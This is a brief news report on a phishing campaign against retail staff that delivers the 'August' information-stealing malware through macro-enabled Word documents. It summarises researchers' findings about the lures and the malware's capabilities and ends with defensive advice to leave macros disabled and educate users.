Cybercriminals are using personalized malware campaigns against staff at retailers in order to steal credentials and sensitive documents.
A group known as TA530, is distributing the information stealing malicious software through socially engineered emails which encourage victims to download an attachment containing the relatively new ‘August’ malware (lines in the malware’s code as well as the control panel for stolen credentials all refer to the month).
Cybersecurity researchers at Proofpoint have been monitoring the August campaign and say the lures used in the subject lines of emails make reference to purchases the hackers claim to have made on the targeted company’s website, asking the targeted victim to provide support for a false purchase.
Subject lines are personalized using the target’s company name, with false queries relating to topics including erroneous or duplicate charges, items vanishing from the online cart and help with orders, while the text of the email points the victim towards a document supposedly containing more information.
The Word document requires the user to enable macros and using similar sandbox evasion techniques as the Ursnif banking Trojan, the enabled macro will deliver a payload to infect the machine.
Once installed, August will steal and upload files, take money from crytocurrency wallets, grab user login credentials by monitoring applications and web browsers and more, with files and information uploaded to a command and control server.
All of this occurs while August is capable of remaining undetected by the infected users thanks to evasion techniques and a fileless approach to loading the malware via PowerShell and a byte array hosted on a remote site. All of these factors result in August being difficult to detect at any point during the operation.
Those behind the scheme are mostly targeting retailers and manufacturers with large business-to-consumer sales operations, although researchers warn that August could be used to steal credentials and files “in a wide range of scenarios”. The TA530 group has previously carried out phishing campaigns against company executives using similar methods.
As email lures and phishing campaigns become more effective one simple form of protection against August – and other malware which require macros to operation – is to not enable macros. Proofpoint researchers also recommend user education to address emails which may not initially look suspicious.